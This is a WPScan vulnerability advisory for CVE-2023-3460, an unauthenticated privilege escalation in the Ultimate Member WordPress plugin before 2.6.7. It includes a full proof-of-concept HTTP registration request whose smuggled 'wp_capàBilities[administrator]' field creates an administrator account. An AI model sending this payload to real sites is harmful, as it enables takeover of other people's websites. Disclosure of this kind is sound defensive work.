WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation

Description

The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.

Proof of Concept

POST /register/ HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Origin: http://wpscan-vulnerability-test-bench.ddev.site
Connection: close
Referer: http://wpscan-vulnerability-test-bench.ddev.site/register/
Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=1b8518cf0ecbf8627f460b2b088024d9; wp_lang=en_US
Upgrade-Insecure-Requests: 1

user_login-29=pwnmemayb2e&user_password-29=P%40ssw0rd%21&confirm_user_password-29=P%40ssw0rd%21&first_name-29=Kaput&wp_cap%c3%a0Bilities-29[administrator]=1&form_id=29&um_request=&_wpnonce=cde6682afb&_wp_http_referer=%2Fregister%2F

Affects Plugins

ultimate-member
Fixed in version 2.6.7

References

CVE
CVE-2023-3460
URL
https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/

Classification

Type

PRIVESC

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-269

Miscellaneous

Original Researcher

Unknown, Marc Montpas

Verified

Yes

WPVDB ID
694235c7-4469-4ffd-a722-9225b19e98d7

Timeline

Publicly Published

2023-06-29 (about 2 months ago)

Added

2023-06-29 (about 2 months ago)

Last Updated

2023-07-03 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin